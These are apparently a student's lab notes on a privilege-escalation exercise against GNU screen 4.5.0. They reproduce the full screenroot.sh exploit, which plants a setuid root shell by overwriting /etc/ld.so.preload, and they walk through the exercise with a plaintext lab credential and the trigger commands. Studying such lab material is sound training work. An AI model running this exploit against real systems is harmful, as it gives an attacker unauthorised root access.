12 - screen (vulnerable service)

# `screen` - [Screen](https://linux.die.net/man/1/screen) is a popular terminal multiplexer similar to `tmux` - Ver 4.5.0 suffers from a privesc vuln due to a lack of a perms check when opening a log file ## version fingerprinting ```bash screen -v ``` ## privesc - Download `screen_exploit.sh`, make exec, and run ```bash sudo chmod +x screen_exploit.sh ./screen_exploit.sh ``` - Below is a POC for a similar privesc called `screenroot.sh` ```bash #!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <sys/stat.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration rm -f /tmp/rootshell.c echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell ``` --- # Exercise ## initial enum - `ping` test ![[images/Pasted image 20260207194641.png]] - `nmap` scans ![[images/Pasted image 20260207194650.png]] - `ssh` to target with given creds `htb-student:Academy_LLPE!` ![[images/Pasted image 20260207194831.png]] - light internal enum on target ![[images/Pasted image 20260207194905.png]] ## run `screen_exploit.sh` - looks like we don't have `screen_exploit.sh` on our Kali box ![[images/Pasted image 20260207194129.png]] - let's grab from `github` - [GitHub - YasserREED/screen-v4.5.0-priv-escalate](https://github.com/YasserREED/screen-v4.5.0-priv-escalate)![[images/Pasted image 20260207194514.png]] - enum `screen` version ![[images/Pasted image 20260207194958.png]] - run exploit on Kali box ![[images/Pasted image 20260207195810.png]] - move to `/tmp` and host files ![[images/Pasted image 20260207195833.png]] - on target box, pull files from Kali host ![[images/Pasted image 20260207195931.png]] - now follow below command sequence ```bash cd /etc || exit 1 umask 000 screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" screen -ls /tmp/rootshell ``` - we are now root ![[images/Pasted image 20260207200135.png]] - navigate to `/root/screen_exploit` and `cat` the flag ![[images/Pasted image 20260207200232.png]]